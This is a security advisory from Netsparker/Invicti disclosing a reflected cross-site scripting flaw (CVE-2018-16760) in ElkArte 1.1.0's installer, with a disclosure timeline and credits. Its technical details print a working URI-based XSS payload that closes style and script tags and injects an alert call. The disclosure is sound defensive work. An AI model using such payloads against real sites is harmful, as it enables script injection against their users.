Cross-site Scripting Vulnerability in ElkArte 1.1.0

Information

Advisory by Netsparker (now Invicti)
Name: Cross-site Scripting Vulnerabilities in ElkArte
Affected Software: ElkArte
Affected Versions: 1.1.0
Homepage: https://www.elkarte.net/
Vulnerability: Cross-site Scripting
Severity: Medium
Status: Not Fixed
CVE-ID: CVE-2018-16760
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Invicti Advisory Reference: NS-18-060

Technical Details

URL: http://app.scan/ScanApp/Elkarte-Install/Elkarte-1.1.0/install/install.php/'"--></style></scRipt><scRipt>netsparker(0x0000D0)</scRipt>
Proof URL: http://app.scan/ScanApp/Elkarte-Install/Elkarte-1.1.0/install/install.php/'"--></style></scRipt><scRipt>alert(0x0000D0)</scRipt>
Parameter Name: URI-BASED
Parameter Type: Full URL
Attack Pattern: /'"--></style></scRipt><scRipt>netsparker(0x0000D0)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline

6th December 2018 – First Contact
7th December 2018 – Details Sent
13th February 2019 – Last Attempt to Contact
4th March 2019 – Advisory Released

Credits & Authors

These issues have been discovered by Omar Kurt while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.